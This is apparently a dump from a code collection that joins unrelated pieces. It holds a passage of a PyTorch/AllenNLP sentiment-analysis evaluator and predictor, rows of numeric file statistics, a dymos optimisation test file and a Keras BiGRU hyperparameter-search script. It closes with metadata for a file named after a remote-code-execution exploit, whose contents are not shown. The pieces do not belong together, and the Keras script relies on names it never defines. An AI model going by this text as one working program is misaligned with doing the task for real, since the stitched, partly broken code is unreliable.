            aspect_pred_i = (aspect_pred[i].squeeze(dim=-1).detach().cpu().numpy() > 0.5).astype(int)
            if self.debug:
                self._print_tensor([aspect_pred_i, aspect_label_i])
            aspect_f1 = f1_score(aspect_label_i, aspect_pred_i, average='binary')
            aspect_precision = precision_score(aspect_label_i, aspect_pred_i, average='binary')
            aspect_recall = recall_score(aspect_label_i, aspect_pred_i, average='binary')
            acd_aspect_and_metrics[aspect] = {
                'f1': aspect_f1,
                'precision': aspect_precision,
                'recall': aspect_recall
            }
        return acd_aspect_and_metrics

    def _acsc_aspect_and_metrics(self, polarity_labels, sentiment_pred, polarity_masks):
        """Per-aspect masked sentiment accuracy (uses the scratch accuracy metric)."""
        acsc_aspect_and_metrics = {}
        for i, aspect in enumerate(self.categories):
            aspect_sentiment_label_i = polarity_labels[i]
            aspect_sentiment_pred_i = sentiment_pred[i]
            aspect_sentiment_mask_i = polarity_masks[i]
            self._sentiment_accuracy_temp(aspect_sentiment_pred_i, aspect_sentiment_label_i,
                                          aspect_sentiment_mask_i)
            # NOTE(review): trailing comma makes this a 1-tuple, hence the [0] below — works but fragile.
            aspect_acc_temp = self._sentiment_accuracy_temp.get_metric(reset=True),
            acsc_aspect_and_metrics[aspect] = {
                'acc': aspect_acc_temp[0],
            }
        return acsc_aspect_and_metrics

    def _polarity_metrics(self, sentiment_logit, sentiment_label, sentiment_mask):
        """Per-polarity F1/precision/recall over masked-in (aspect-present) positions only."""
        sentiment_label_pred_list = sentiment_logit.argmax(dim=-1).detach().cpu().numpy().tolist()
        sentiment_label_list = sentiment_label.detach().cpu().numpy().tolist()
        sentiment_mask_list = sentiment_mask.detach().cpu().numpy().tolist()
        sentiment_label_pred_final = []
        sentiment_label_final = []
        for i in range(len(sentiment_mask_list)):
            sentiment_label_list_i = sentiment_label_list[i]
            sentiment_label_pred_list_i = sentiment_label_pred_list[i]
            sentiment_mask_list_i = sentiment_mask_list[i]
            # mask == 0 means the aspect is absent from this sample; skip it.
            if sentiment_mask_list_i == 0:
                continue
            sentiment_label_pred_final.append(sentiment_label_pred_list_i)
            sentiment_label_final.append(sentiment_label_list_i)
        sentiment_f1s = f1_score(np.array(sentiment_label_final), np.array(sentiment_label_pred_final),
                                 average=None, labels=list(range(len(self.polarities))))
        sentiment_precisions = precision_score(np.array(sentiment_label_final),
                                               np.array(sentiment_label_pred_final),
                                               average=None, labels=list(range(len(self.polarities))))
        sentiment_recalls = recall_score(np.array(sentiment_label_final),
                                         np.array(sentiment_label_pred_final),
                                         average=None, labels=list(range(len(self.polarities))))
        polarity_metrics = {}
        for i, polarity in enumerate(self.polarities):
            polarity_metrics[polarity] = {
                'f1': sentiment_f1s[i],
                'precision': sentiment_precisions[i],
                'recall': sentiment_recalls[i]
            }
        return polarity_metrics

    def _merge_micro_f1(self, merge_label_real, merge_logit_real):
        """Micro-F1 over merged category+sentiment predictions; class 0 means 'aspect absent'
        and counts toward neither predicted nor true totals."""
        tp = 0
        pred_total = 0
        true_total = 0
        for i in range(merge_logit_real.shape[0]):
            pred = merge_logit_real[i]
            true = merge_label_real[i]
            if pred != 0:
                pred_total += 1
            if true != 0:
                true_total += 1
            if pred == true != 0:
                tp += 1
        # Tiny epsilon avoids division by zero when nothing is predicted/true.
        if pred_total == 0:
            pred_total = 0.0000000000000001
        if true_total == 0:
            true_total = 0.0000000000000001
        p = tp / pred_total
        r = tp / true_total
        if p == 0 and r == 0:
            f1 = 0
        else:
            f1 = 2 * (p * r) / (p + r)
        return f1

    def _inner_estimate(self, label, polarity_mask, aspect_pred, sentiment_pred, merge_pred):
        """Compute all metrics from concatenated labels/predictions and stash them in other_metrics.

        Label layout per sample: [0, cn) category presence, [cn, 2*cn) polarity
        index, [2*cn, 3*cn) merged category+sentiment class (cn = #categories).
        """
        category_labels = []
        polarity_labels = []
        merge_labeles = []
        polarity_masks = []
        category_num = len(self.categories)
        for i in range(category_num):
            category_labels.append(label[:, i])
            polarity_labels.append(label[:, i + category_num])
            polarity_masks.append(polarity_mask[:, i])
            merge_labeles.append(label[:, i + category_num * 2])
        if self.debug:
            self._print_tensor([label] + category_labels + polarity_labels + merge_labeles)
            self._print_tensor([polarity_mask] + polarity_masks)
        acd_aspect_and_metrics = self._acd_aspect_and_metrics(category_labels, aspect_pred)
        self.other_metrics['acd_metrics'] = acd_aspect_and_metrics
        # category f1
        category_prob = torch.cat(aspect_pred).squeeze()
        category_label = torch.cat(category_labels)
        self._aspect_f1(category_prob, category_label)
        if not self.configuration['only_acd']:
            acsc_aspect_and_metrics = self._acsc_aspect_and_metrics(polarity_labels, sentiment_pred,
                                                                    polarity_masks)
            self.other_metrics['acsc_metrics'] = acsc_aspect_and_metrics
            # sentiment accuracy
            sentiment_logit = torch.cat(sentiment_pred)
            sentiment_label = torch.cat(polarity_labels)
            sentiment_mask = torch.cat(polarity_masks)
            self._sentiment_accuracy(sentiment_logit, sentiment_label, sentiment_mask)
            polarity_metrics = self._polarity_metrics(sentiment_logit, sentiment_label, sentiment_mask)
            self.other_metrics['polarity_metrics'] = polarity_metrics
            # merge
            merge_logit = torch.cat(merge_pred)
            # Positions where either prediction or gold says the aspect is present.
            merge_pred_aspect_indicator = (merge_logit.argmax(dim=-1) != 0)
            merge_pred_aspect_indicator = nn_util.move_to_device(merge_pred_aspect_indicator, self.cuda_device)
            merge_label = torch.cat(merge_labeles)
            merge_label_aspect_indicator = (merge_label != 0)
            merge_label_aspect_indicator = nn_util.move_to_device(merge_label_aspect_indicator, self.cuda_device)
            merge_aspect_indicator = merge_pred_aspect_indicator | merge_label_aspect_indicator
            if self.debug:
                self._print_tensor([merge_logit, merge_pred_aspect_indicator, merge_label,
                                    merge_label_aspect_indicator, merge_aspect_indicator])
            merge_logit_real = merge_logit[merge_aspect_indicator].argmax(dim=-1).detach().cpu().numpy()
            merge_label_real = merge_label[merge_aspect_indicator].detach().cpu().numpy()
            if self.debug:
                self._print_tensor([merge_logit_real, merge_label_real])
            # merge_micro_f1 = f1_score(merge_label_real, merge_logit_real, average='micro')
            merge_micro_f1 = self._merge_micro_f1(merge_label_real, merge_logit_real)
            self.other_metrics['merge_micro_f1'] = merge_micro_f1

    def estimate(self, ds: Iterable[Instance]) -> dict:
        """Run the model over `ds` (no grad), collect predictions, and compute all metrics.

        When the model does not emit 'merge_pred', a merged category+sentiment
        distribution is synthesized: slot 0 gets 1.1 (> any softmax prob) when the
        category score is below the aspect threshold, forcing an 'absent' argmax.
        """
        self.model.eval()
        pred_generator = self.iterator(ds, num_epochs=1, shuffle=False)
        pred_generator_tqdm = tqdm(pred_generator, total=self.iterator.get_num_batches(ds))
        with torch.no_grad():
            labels = []
            polarity_masks = []
            pred_categorys = []
            pred_sentiments = []
            pred_merges = []
            for batch in pred_generator_tqdm:
                label = batch['label']
                labels.append(label)
                polarity_mask = batch['polarity_mask']
                polarity_masks.append(polarity_mask)
                batch = nn_util.move_to_device(batch, self.cuda_device)
                out_dict = self.model(**batch)
                pred_category = out_dict['pred_category']
                pred_categorys.append(pred_category)
                if not self.configuration['only_acd']:
                    pred_sentiment = out_dict['pred_sentiment']
                    pred_sentiments.append(pred_sentiment)
                    if 'merge_pred' in out_dict:
                        pred_merge = out_dict['merge_pred']
                    else:
                        pred_merge = []
                        for i in range(len(self.categories)):
                            pred_category_i = pred_category[i].detach().clone().squeeze(-1)
                            pred_sentiment_i = torch.softmax(pred_sentiment[i], dim=-1)
                            aspect_threshold = 0.5 if 'aspect_threshold' not in self.configuration \
                                else self.configuration['aspect_threshold']
                            pred_category_i_indicator = pred_category_i > aspect_threshold
                            pred_category_i_indicator_not = pred_category_i <= aspect_threshold
                            if self.debug:
                                print(i)
                                self._print_tensor([pred_category_i, pred_sentiment_i,
                                                    pred_category_i_indicator, pred_category_i_indicator_not])
                            # Present aspects -> 0 in slot 0 (sentiment wins argmax);
                            # absent aspects -> 1.1 in slot 0 (dominates any softmax prob).
                            pred_category_i[pred_category_i_indicator] = 0
                            pred_category_i[pred_category_i_indicator_not] = 1.1
                            pred_category_i = pred_category_i.unsqueeze(-1)
                            if self.debug:
                                self._print_tensor([pred_category[i], pred_category_i,
                                                    torch.cat([pred_category_i, pred_sentiment_i], dim=-1)])
                            pred_merge.append(torch.cat([pred_category_i, pred_sentiment_i], dim=-1))
                    pred_merges.append(pred_merge)
            # Re-group the per-batch, per-aspect lists into per-aspect tensors over the whole dataset.
            label_final = torch.cat(labels, dim=0)
            polarity_mask_final = torch.cat(polarity_masks, dim=0)
            pred_category_final = []
            pred_sentiment_final = []
            pred_merge_final = []
            for i in range(len(self.categories)):
                pred_category_i = [e[i] for e in pred_categorys]
                pred_category_i_cat = torch.cat(pred_category_i, dim=0)
                pred_category_final.append(pred_category_i_cat)
                if not self.configuration['only_acd']:
                    pred_sentiment_i = [e[i] for e in pred_sentiments]
                    pred_sentiment_i_cat = torch.cat(pred_sentiment_i, dim=0)
                    pred_sentiment_final.append(pred_sentiment_i_cat)
                    pred_merge_i = [e[i] for e in pred_merges]
                    pred_merge_i_cat = torch.cat(pred_merge_i, dim=0)
                    pred_merge_final.append(pred_merge_i_cat)
            # self._estimate(label_final, polarity_mask_final, pred_category_final, pred_sentiment_final)
            self._inner_estimate(label_final, polarity_mask_final, pred_category_final,
                                 pred_sentiment_final, pred_merge_final)
        return {'sentiment_acc': self._sentiment_accuracy.get_metric(reset=True),
                'category_f1': self._aspect_f1.get_metric(reset=True),
                'other_metrics': self._get_other_metrics()}


class Predictor:
    """Abstract base: run a model over a dataset and return predictions."""

    def predict(self, ds: Iterable[Instance]) -> dict:
        raise NotImplementedError('predict')


class TextInAllAspectSentimentOutPredictor(Predictor):
    # NOTE(review): __init__ continues past this chunk of the file.
    def __init__(self, model: Model, iterator: DataIterator, categories: list, polarities: list,
                 cuda_device: int = -1, configuration: dict=None) -> None:
        super().__init__()
        self.model = model
        self.iterator = iterator
        self.categories = categories
        self.polarities = polarities
self.cuda_device = cuda_device self.configuration = configuration self.debug = False def _print_tensor(self, tensors: List): print('------------------------------------------------------') list_list = [e.detach().cpu().numpy().tolist() if not isinstance(e, np.ndarray) else e.tolist() for e in tensors] for k in range(len(list_list[0])): format_str = '-'.join(['%s'] * len(list_list)) values = tuple(e[k] for e in list_list) print(format_str % values) def predict(self, ds: Iterable[Instance]) -> dict: with torch.no_grad(): self.model.eval() pred_generator = self.iterator(ds, num_epochs=1, shuffle=False) pred_generator_tqdm = tqdm(pred_generator, total=self.iterator.get_num_batches(ds)) labels = [] polarity_masks = [] pred_categorys = [] pred_sentiments = [] pred_merges = [] for batch in pred_generator_tqdm: label = batch['label'] labels.append(label) polarity_mask = batch['polarity_mask'] polarity_masks.append(polarity_mask) batch = nn_util.move_to_device(batch, self.cuda_device) out_dict = self.model(**batch) pred_category = out_dict['pred_category'] pred_categorys.append(pred_category) if not self.configuration['only_acd']: pred_sentiment = out_dict['pred_sentiment'] pred_sentiments.append(pred_sentiment) if 'merge_pred' in out_dict: pred_merge = out_dict['merge_pred'] else: pred_merge = [] for i in range(len(self.categories)): pred_category_i = pred_category[i].detach().clone().squeeze(-1) pred_sentiment_i = torch.softmax(pred_sentiment[i], dim=-1) aspect_threshold = 0.5 if 'aspect_threshold' not in self.configuration else self.configuration['aspect_threshold'] pred_category_i_indicator = pred_category_i > aspect_threshold pred_category_i_indicator_not = pred_category_i <= aspect_threshold if self.debug: print(i) self._print_tensor([pred_category_i, pred_sentiment_i, pred_category_i_indicator, pred_category_i_indicator_not]) pred_category_i[pred_category_i_indicator] = 0 pred_category_i[pred_category_i_indicator_not] = 1.1 pred_category_i = 
pred_category_i.unsqueeze(-1) if self.debug: self._print_tensor([pred_category[i], pred_category_i, torch.cat([pred_category_i, pred_sentiment_i], dim=-1)]) pred_merge.append(torch.cat([pred_category_i, pred_sentiment_i], dim=-1)) pred_merges.append(pred_merge) label_final = torch.cat(labels, dim=0) polarity_mask_final = torch.cat(polarity_masks, dim=0) pred_category_final = [] pred_sentiment_final = [] pred_merge_final = [] for i in range(len(self.categories)): pred_category_i = [e[i] for e in pred_categorys] pred_category_i_cat = torch.cat(pred_category_i, dim=0) pred_category_final.append(pred_category_i_cat) if not self.configuration['only_acd']: pred_sentiment_i = [e[i] for e in pred_sentiments] pred_sentiment_i_cat = torch.cat(pred_sentiment_i, dim=0) pred_sentiment_final.append(pred_sentiment_i_cat) pred_merge_i = [e[i] for e in pred_merges] pred_merge_i_cat = torch.cat(pred_merge_i, dim=0) pred_merge_final.append(pred_merge_i_cat) result = [] for i in range(len(ds)): sample_label = label_final[i][len(self.categories): len(self.categories) + len(self.categories)] sample_predict = [pred_sentiment_final[j][i] for j in range(len(self.categories))] sample_result = [] for j in range(len(self.categories)): if sample_label[j] == -100: continue category = self.categories[j] sentiment_index = sample_predict[j].argmax(dim=-1) sentiment = self.polarities[sentiment_index] sample_result.append((category, sentiment)) result.append(sample_result) return result class TextInAllAspectSentimentOutPredictorOnInstanceLevel(Predictor): def __init__(self, model: Model, iterator: DataIterator, categories: list, polarities: list, cuda_device: int = -1, configuration: dict=None) -> None: super().__init__() self.model = model self.iterator = iterator self.categories = categories self.polarities = polarities self.cuda_device = cuda_device self.configuration = configuration self.debug = False def _print_tensor(self, tensors: List): 
print('------------------------------------------------------') list_list = [e.detach().cpu().numpy().tolist() if not isinstance(e, np.ndarray) else e.tolist() for e in tensors] for k in range(len(list_list[0])): format_str = '-'.join(['%s'] * len(list_list)) values = tuple(e[k] for e in list_list) print(format_str % values) def predict(self, ds: Iterable[Instance]) -> dict: result = [] with torch.no_grad(): self.model.eval() pred_generator = self.iterator(ds, num_epochs=1, shuffle=False) pred_generator_tqdm = tqdm(pred_generator, total=self.iterator.get_num_batches(ds)) for batch in pred_generator_tqdm: batch = nn_util.move_to_device(batch, self.cuda_device) out_dict = self.model(**batch) attention_weights = out_dict['embedding_layer_category_alphas'] word_sentiments = out_dict['lstm_layer_words_sentiment_soft'] for i in range(word_sentiments[0].shape[0]): attention_weights_of_one_sample = [e[i].detach().cpu().numpy() for e in attention_weights] word_sentiments_of_one_sample = [e[i].detach().cpu().numpy() for e in word_sentiments] result.append({'attention_weights': attention_weights_of_one_sample, 'word_sentiments': word_sentiments_of_one_sample}) return result class TextInAllAspectSentimentOutEstimatorAll(Estimator): def __init__(self, model: Model, iterator: DataIterator, categories: list, polarities: list, cuda_device: int = -1, configuration: dict=None) -> None: super().__init__() self.model = model self.iterator = iterator self.categories = categories self.polarities = polarities self._accuracy = metrics.CategoricalAccuracy() self._f1 = allennlp_metrics.BinaryF1(0.5) self.cuda_device = cuda_device self.configuration = configuration def _estimate(self, batch) -> np.ndarray: label = batch['label'] polarity_mask = batch['polarity_mask'] category_labels = [] polarity_labels = [] polarity_masks = [] for i in range(len(self.categories)): category_labels.append(label[:, i]) polarity_labels.append(label[:, i + len(self.categories)]) 
polarity_masks.append(polarity_mask[:, i]) out_dict = self.model(**batch) pred_category = out_dict['pred_category'] if not self.configuration['only_acd']: pred_sentiment = out_dict['pred_sentiment'] sentiment_logit = torch.cat(pred_sentiment) sentiment_label = torch.cat(polarity_labels) sentiment_mask = torch.cat(polarity_masks) self._accuracy(sentiment_logit, sentiment_label, sentiment_mask) # category f1 category_prob = torch.cat(pred_category).squeeze() category_label = torch.cat(category_labels) self._f1(category_prob, category_label) def estimate(self, ds: Iterable[Instance]) -> dict: self.model.eval() pred_generator = self.iterator(ds, num_epochs=1, shuffle=False) pred_generator_tqdm = tqdm(pred_generator, total=self.iterator.get_num_batches(ds)) with torch.no_grad(): for batch in pred_generator_tqdm: batch = nn_util.move_to_device(batch, self.cuda_device) self._estimate(batch) return {'sentiment_acc': self._accuracy.get_metric(reset=True), 'category_f1': self._f1.get_metric(reset=True)}
54.241701
191
0.608417
11,400
104,578
5.209737
0.037281
0.029466
0.019953
0.019835
0.877338
0.846728
0.821202
0.803203
0.784075
0.773046
0
0.006729
0.306499
104,578
1,927
192
54.26985
0.812175
0.065932
0
0.766391
0
0
0.030088
0.013525
0
0
0
0
0
1
0.040738
false
0.00191
0.023552
0
0.0993
0.015277
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
c4d4825a3bd9b71b736ce38fed155a48eaf381f4
10,408
py
Python
dymos/phase/test/test_sized_input_parameters.py
mjfwest/dymos
8650bf8087c551fc8a6faf3aa5723c3739b9617e
[ "Apache-2.0" ]
null
null
null
dymos/phase/test/test_sized_input_parameters.py
mjfwest/dymos
8650bf8087c551fc8a6faf3aa5723c3739b9617e
[ "Apache-2.0" ]
null
null
null
dymos/phase/test/test_sized_input_parameters.py
mjfwest/dymos
8650bf8087c551fc8a6faf3aa5723c3739b9617e
[ "Apache-2.0" ]
null
null
null
import unittest import openmdao.api as om from openmdao.utils.assert_utils import assert_near_equal import dymos as dm from dymos.utils.lgl import lgl from dymos.models.eom import FlightPathEOM2D import numpy as np class TestInputParameterConnections(unittest.TestCase): def test_dynamic_input_parameter_connections_radau(self): class TrajectoryODE(om.Group): def initialize(self): self.options.declare('num_nodes', types=int) def setup(self): nn = self.options['num_nodes'] self.add_subsystem('sum', om.ExecComp('m_tot = sum(m)', m={'value': np.zeros((nn, 2, 2)), 'units': 'kg'}, m_tot={'value': np.zeros(nn), 'units': 'kg'})) self.add_subsystem('eom', FlightPathEOM2D(num_nodes=nn)) self.connect('sum.m_tot', 'eom.m') optimizer = 'SLSQP' num_segments = 1 transcription_order = 5 p = om.Problem(model=om.Group()) p.driver = om.pyOptSparseDriver() p.driver.options['optimizer'] = optimizer p.driver.declare_coloring() seg_ends, _ = lgl(num_segments + 1) # @dm.declare_time(units='s') # @dm.declare_state('v', rate_source='eom.v_dot', units='m/s') # @dm.declare_state('h', rate_source='eom.h_dot', units='m') # @dm.declare_parameter('m', targets='sum.m', units='kg', shape=(2, 2)) phase = dm.Phase(ode_class=TrajectoryODE, transcription=dm.Radau(num_segments=num_segments, order=transcription_order, segment_ends=seg_ends)) p.model.add_subsystem('phase0', phase) phase.set_time_options(initial_bounds=(0.0, 100.0), duration_bounds=(0., 100.), units='s') phase.add_state('h', fix_initial=True, fix_final=True, lower=0.0, units='m', rate_source='eom.h_dot') phase.add_state('v', fix_initial=True, fix_final=False, units='m/s', rate_source='eom.v_dot') phase.add_input_parameter('m', val=[[1, 2], [3, 4]], units='kg', targets='sum.m') p.model.linear_solver = om.DirectSolver() p.setup(check=True, force_alloc_complex=True) p['phase0.t_initial'] = 0.0 p['phase0.t_duration'] = 100.0 p['phase0.states:h'] = phase.interpolate(ys=[20, 0], nodes='state_input') p['phase0.states:v'] = phase.interpolate(ys=[0, 
-5], nodes='state_input') p.run_model() expected = np.broadcast_to(np.array([[1, 2], [3, 4]]), (p.model.phase0.options['transcription'].grid_data.num_nodes, 2, 2)) assert_near_equal(p.get_val('phase0.rhs_all.sum.m'), expected) def test_static_input_parameter_connections_radau(self): class TrajectoryODE(om.Group): def initialize(self): self.options.declare('num_nodes', types=int) def setup(self): nn = self.options['num_nodes'] self.add_subsystem('sum', om.ExecComp('m_tot = sum(m)', m={'value': np.zeros((2, 2)), 'units': 'kg'}, m_tot={'value': np.zeros(nn), 'units': 'kg'})) self.add_subsystem('eom', FlightPathEOM2D(num_nodes=nn)) self.connect('sum.m_tot', 'eom.m') optimizer = 'SLSQP' num_segments = 1 transcription_order = 5 p = om.Problem(model=om.Group()) p.driver = om.pyOptSparseDriver() p.driver.options['optimizer'] = optimizer p.driver.declare_coloring() seg_ends, _ = lgl(num_segments + 1) phase = dm.Phase(ode_class=TrajectoryODE, transcription=dm.Radau(num_segments=num_segments, order=transcription_order, segment_ends=seg_ends)) p.model.add_subsystem('phase0', phase) phase.set_time_options(initial_bounds=(0.0, 100.0), duration_bounds=(0., 100.)) phase.add_state('h', fix_initial=True, fix_final=True, lower=0.0, units='m', rate_source='eom.h_dot') phase.add_state('v', fix_initial=True, fix_final=False, units='m/s', rate_source='eom.v_dot') phase.add_input_parameter('m', val=[[1, 2], [3, 4]], units='kg', targets='sum.m', dynamic=False) p.model.linear_solver = om.DirectSolver() p.setup(check=True, force_alloc_complex=True) p['phase0.t_initial'] = 0.0 p['phase0.t_duration'] = 100.0 p['phase0.states:h'] = phase.interpolate(ys=[20, 0], nodes='state_input') p['phase0.states:v'] = phase.interpolate(ys=[0, -5], nodes='state_input') p.run_model() expected = np.array([[1, 2], [3, 4]]) assert_near_equal(p.get_val('phase0.rhs_all.sum.m'), expected) def test_dynamic_input_parameter_connections_gl(self): class TrajectoryODE(om.Group): def initialize(self): 
self.options.declare('num_nodes', types=int) def setup(self): nn = self.options['num_nodes'] self.add_subsystem('sum', om.ExecComp('m_tot = sum(m)', m={'value': np.zeros((nn, 2, 2)), 'units': 'kg'}, m_tot={'value': np.zeros(nn), 'units': 'kg'})) self.add_subsystem('eom', FlightPathEOM2D(num_nodes=nn)) self.connect('sum.m_tot', 'eom.m') optimizer = 'SLSQP' num_segments = 1 transcription_order = 5 p = om.Problem(model=om.Group()) p.driver = om.pyOptSparseDriver() p.driver.options['optimizer'] = optimizer p.driver.declare_coloring() seg_ends, _ = lgl(num_segments + 1) phase = dm.Phase(ode_class=TrajectoryODE, transcription=dm.GaussLobatto(num_segments=num_segments, order=transcription_order, segment_ends=seg_ends)) p.model.add_subsystem('phase0', phase) phase.set_time_options(initial_bounds=(0.0, 100.0), duration_bounds=(0., 100.), units='s') phase.add_state('h', fix_initial=True, fix_final=True, lower=0.0, units='m', rate_source='eom.h_dot') phase.add_state('v', fix_initial=True, fix_final=False, units='m/s', rate_source='eom.v_dot') phase.add_input_parameter('m', val=[[1, 2], [3, 4]], units='kg', targets='sum.m') p.model.linear_solver = om.DirectSolver() p.setup(check=True, force_alloc_complex=True) p['phase0.t_initial'] = 0.0 p['phase0.t_duration'] = 100.0 p['phase0.states:h'] = phase.interpolate(ys=[20, 0], nodes='state_input') p['phase0.states:v'] = phase.interpolate(ys=[0, -5], nodes='state_input') p.run_model() gd = p.model.phase0.options['transcription'].grid_data expected = np.broadcast_to(np.array([[1, 2], [3, 4]]), (gd.subset_num_nodes['state_disc'], 2, 2)) assert_near_equal(p.get_val('phase0.rhs_disc.sum.m'), expected) expected = np.broadcast_to(np.array([[1, 2], [3, 4]]), (gd.subset_num_nodes['col'], 2, 2)) assert_near_equal(p.get_val('phase0.rhs_col.sum.m'), expected) def test_static_input_parameter_connections_gl(self): class TrajectoryODE(om.Group): def initialize(self): self.options.declare('num_nodes', types=int) def setup(self): nn = 
self.options['num_nodes'] self.add_subsystem('sum', om.ExecComp('m_tot = sum(m)', m={'value': np.zeros((2, 2)), 'units': 'kg'}, m_tot={'value': np.zeros(nn), 'units': 'kg'})) self.add_subsystem('eom', FlightPathEOM2D(num_nodes=nn)) self.connect('sum.m_tot', 'eom.m') optimizer = 'SLSQP' num_segments = 1 transcription_order = 5 p = om.Problem(model=om.Group()) p.driver = om.pyOptSparseDriver() p.driver.options['optimizer'] = optimizer p.driver.declare_coloring() seg_ends, _ = lgl(num_segments + 1) phase = dm.Phase(ode_class=TrajectoryODE, transcription=dm.GaussLobatto(num_segments=num_segments, order=transcription_order, segment_ends=seg_ends)) p.model.add_subsystem('phase0', phase) phase.set_time_options(initial_bounds=(0.0, 100.0), duration_bounds=(0., 100.), units='s') phase.add_state('h', fix_initial=True, fix_final=True, lower=0.0, units='m', rate_source='eom.h_dot') phase.add_state('v', fix_initial=True, fix_final=False, units='m/s', rate_source='eom.v_dot') phase.add_input_parameter('m', val=[[1, 2], [3, 4]], units='kg', targets='sum.m', dynamic=False) p.model.linear_solver = om.DirectSolver() p.setup(check=True, force_alloc_complex=True) p['phase0.t_initial'] = 0.0 p['phase0.t_duration'] = 100.0 p['phase0.states:h'] = phase.interpolate(ys=[20, 0], nodes='state_input') p['phase0.states:v'] = phase.interpolate(ys=[0, -5], nodes='state_input') p.run_model() expected = np.array([[1, 2], [3, 4]]) assert_near_equal(p.get_val('phase0.rhs_disc.sum.m'), expected) assert_near_equal(p.get_val('phase0.rhs_col.sum.m'), expected) if __name__ == '__main__': # pragma: no cover unittest.main()
38.405904
109
0.533628
1,250
10,408
4.24
0.1048
0.01434
0.024528
0.006792
0.926038
0.919623
0.91566
0.900566
0.900566
0.896981
0
0.026885
0.324558
10,408
270
110
38.548148
0.727027
0.022483
0
0.877907
0
0
0.100708
0.004131
0
0
0
0
0.040698
1
0.069767
false
0
0.040698
0
0.139535
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
f2042ecf7c552015698c774d9d94760751ea54d4
4,249
py
Python
models/ht_models/bigru.py
NLashkarashvili/Toxicity_Detection_in_Georgian_Discussions
d5a639c866d33258e91bc401b087b9fba969384e
[ "MIT" ]
1
2022-03-13T16:59:37.000Z
2022-03-13T16:59:37.000Z
models/ht_models/bigru.py
NLashkarashvili/Toxicity_Detection_in_Georgian_Discussions
d5a639c866d33258e91bc401b087b9fba969384e
[ "MIT" ]
null
null
null
models/ht_models/bigru.py
NLashkarashvili/Toxicity_Detection_in_Georgian_Discussions
d5a639c866d33258e91bc401b087b9fba969384e
[ "MIT" ]
null
null
null
import tensorflow as tf import scipy.stats as stats from kerashypetune import KerasRandomSearch from gensim import models from tensorflow import keras from tensorflow.keras import layers from sklearn.metrics import roc_auc_score from sklearn.model_selection import train_test_split from tensorflow.keras.layers.experimental.preprocessing import TextVectorization ##model for FastText pretrained embeddings (embed_dim set to 300) def get_model(param, maxlen=25, vocab_size=vocab_size, embed_dim=300): inputs = layers.Input(shape=(maxlen,)) embedding_layer = layers.Embedding(input_dim = vocab_size, output_dim=embed_dim, input_length=maxlen) x = embedding_layer(inputs) x = layers.Bidirectional(layers.GRU(param['unit_1'], input_dim=(None, embed_dim), return_sequences=False, activation='tanh', dropout=param['dropout']))(x) outputs = layers.Dense(1, activation="sigmoid")(x) model = keras.Model(inputs=inputs, outputs=outputs) model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=param['lr']), loss="binary_crossentropy", metrics=["accuracy", tf.keras.metrics.AUC(name='auc')]) return model from sklearn.model_selection import StratifiedShuffleSplit sss = StratifiedShuffleSplit(n_splits=1, test_size=0.15, random_state=0) for train_index, test_index in sss.split(data['comment'], data['label']): X_train, X_test = data['comment'].iloc[train_index], data['comment'].iloc[test_index] y_train, y_test = data['label'].iloc[train_index], data['label'].iloc[test_index] param_grid = { 'unit_1': [32, 64, 128], 'dropout': [0.1, 0.2, 0.3, 0.4, 0.5], 'lr': stats.uniform(1e-4, 1e-2), 'epochs': 5, 'batch_size': [32, 64, 128] } X_train = vectorizer(np.array([[s] for s in X_train])).numpy() X_test = vectorizer(np.array([[s] for s in X_test])).numpy() X_train = keras.preprocessing.sequence.pad_sequences(X_train, maxlen=25) X_test = keras.preprocessing.sequence.pad_sequences(X_test, maxlen=25) kgs = KerasRandomSearch(get_model, param_grid, monitor='val_auc', greater_is_better=True, n_iter=15) 
kgs.search(X_train, y_train, validation_data=(X_test, y_test)) ############################################################################## ##model without FastText Embeddings def get_model(param, maxlen=25, vocab_size=n_word_unique + 1): inputs = layers.Input(shape=(maxlen,)) embedding_layer = layers.Embedding(input_dim = vocab_size, output_dim=param['embed_dim'], input_length=maxlen) x = embedding_layer(inputs) x = layers.Bidirectional(layers.GRU(param['unit_1'], input_dim=(None, param['embed_dim']), return_sequences=False, activation='tanh', dropout=param['dropout']))(x) outputs = layers.Dense(1, activation="sigmoid")(x) model = keras.Model(inputs=inputs, outputs=outputs) model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=param['lr']), loss="binary_crossentropy", metrics=["accuracy", tf.keras.metrics.AUC(name='auc')]) return model from sklearn.model_selection import StratifiedShuffleSplit sss = StratifiedShuffleSplit(n_splits=1, test_size=0.15, random_state=0) for train_index, test_index in sss.split(data['comment'], data['label']): X_train, X_test = data['comment'].iloc[train_index], data['comment'].iloc[test_index] y_train, y_test = data['label'].iloc[train_index], data['label'].iloc[test_index] param_grid = { 'unit_1': [32, 64, 128], 'dropout': [0.1, 0.2, 0.3, 0.4, 0.5], 'embed_dim': [32, 64, 128], 'lr': stats.uniform(1e-4, 1e-2), 'epochs': 5, 'batch_size': [32, 64, 128] } X_train = keras.preprocessing.sequence.pad_sequences(X_train, maxlen=25) X_test = keras.preprocessing.sequence.pad_sequences(X_test, maxlen=25) kgs = KerasRandomSearch(get_model, param_grid, monitor='val_auc', greater_is_better=True, n_iter=15) kgs.search(X_train, y_train, validation_data=(X_test, y_test)) print(kgs.best_params)
43.804124
101
0.664392
571
4,249
4.744308
0.220666
0.022148
0.01292
0.026578
0.828719
0.817276
0.817276
0.817276
0.774456
0.774456
0
0.030049
0.185455
4,249
96
102
44.260417
0.752673
0.022594
0
0.712329
0
0
0.070499
0
0
0
0
0
0
1
0.027397
false
0
0.150685
0
0.205479
0.013699
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
1ef81f60598533a61f73f42b5eb13d51da413153
43,130
py
Python
Moudle/Weaver/Weaver_e_Cology_RCE.py
WingsSec/Meppo
454aa6ce6cc3e93cadb2dc0c455c56fa5e0f1a94
[ "MIT" ]
60
2022-03-22T02:40:41.000Z
2022-03-29T06:23:57.000Z
Moudle/Weaver/Weaver_e_Cology_RCE.py
BambooLove/Meppo
96e023c0b07c09f334b44fcfb9abfe741a082f0f
[ "MIT" ]
null
null
null
Moudle/Weaver/Weaver_e_Cology_RCE.py
BambooLove/Meppo
